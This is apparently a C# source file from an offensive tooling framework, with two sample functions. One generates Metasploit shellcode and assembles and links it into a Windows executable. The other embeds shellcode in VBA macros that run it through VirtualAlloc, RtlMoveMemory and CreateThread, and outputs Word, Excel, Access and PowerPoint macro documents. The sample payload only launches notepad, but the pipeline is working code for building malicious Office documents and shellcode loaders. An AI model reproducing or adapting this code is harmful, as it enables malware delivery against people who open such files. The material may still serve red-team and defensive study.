// Assembly example with shellcode using Yasm + GoLink
private static IAttack AssemblyShellcodeYasmGoLinkExample()
{
    var samplesOutput = new SamplesOutput();
    var attackName = "AssemblyShellcodeYasmGoLink";
    var attack = new Attack(new IOutput[] {
        samplesOutput,
    }, name: attackName);

    // Metasploit payloads can be easily generated
    var shellcodeBytes = MetasploitPayloadFactory.Generate(format: "raw", payload: "windows/x64/exec", options: "EXITFUNC=thread CMD=notepad");
    // They need to be wrapped in the appropriate class.
    var shellcode = new ShellcodeX64(shellcodeBytes);

    // This is YASM assembly language source that includes the shellcode instructions as-is
    var rawShellcodeAsm = new RawShellcodeYasmAssemblySource(
        shellcode,
        // A label for the start of the shellcode. Can be called like a function from C
        symbolName: "SheSellsShellCodesByTheSilkRoad",
        // Some shellcode needs to be in a memory page that has RWX permissions.
        // This is not one of them, but let's give the section write permissions anyway
        sectionWritable: true
    );

    var staticLibrary = ((IAssembler<YASM, Win64ObjectFile>) new MyWarez.Plugins.Yasm.Yasm()).Assemble(rawShellcodeAsm);
    var entryPoint = ((ICFunction)rawShellcodeAsm).Name;
    var linkerConfig = new MyWarez.Plugins.GoDevTool.Linker.Config(ENTRY: entryPoint);
    var createProcessExe = ((ILinker<Win64ObjectFile, Executable>) new MyWarez.Plugins.GoDevTool.Linker(linkerConfig)).Link(staticLibrary);

    // Double click to confirm that notepad spawns
    // Note: Linking with MSVC instead of GoLink would also be an option
    samplesOutput.Add("AssemblyShellcodeYasmGoLinkNotepad.exe", createProcessExe);

    attack.Generate();
    return attack;
}
// Office VBA macro example
private static IAttack OfficeVbaMacroExample()
{
    var samplesOutput = new SamplesOutput();
    var attackName = "OfficeVbaMacro";
    var attack = new Attack(new IOutput[] {
        samplesOutput,
    }, name: attackName);

    var shellcodeBytes = MetasploitPayloadFactory.Generate(format: "raw", payload: "windows/exec", options: "EXITFUNC=thread CMD=notepad");
    // Most installs of Microsoft Office are 32-bit
    var shellcode = new ShellcodeX86(shellcodeBytes);

    // VBA macro that uses VirtualAlloc + RtlMoveMemory + CreateThread to execute shellcode
    var vbaMacro = new ShellcodeVbaMacro(shellcode);

    var wordVbaMacro = new WordVBAMacro(vbaMacro);
    var wordVbaMacroFilename = "WordVbaMacro" + "." + wordVbaMacro.Extension;
    samplesOutput.Add(wordVbaMacroFilename, wordVbaMacro);

    var excelVbaMacro = new ExcelVBAMacro(vbaMacro);
    var excelVbaMacroFilename = "ExcelVbaMacro" + "." + excelVbaMacro.Extension;
    samplesOutput.Add(excelVbaMacroFilename, excelVbaMacro);

    var accessVbaMacro = new AccessVBAMacro(vbaMacro);
    var accessVbaMacroFilename = "AccessVbaMacro" + "." + accessVbaMacro.Extension;
    samplesOutput.Add(accessVbaMacroFilename, accessVbaMacro);

    var powerPointVbaMacro = new PowerPointVBAMacro(vbaMacro);
    var powerPointVbaMacroFilename = "PowerPointVbaMacro" + "." + powerPointVbaMacro.Extension;
    samplesOutput.Add(powerPointVbaMacroFilename, powerPointVbaMacro);

    attack.Generate();
    return attack;
}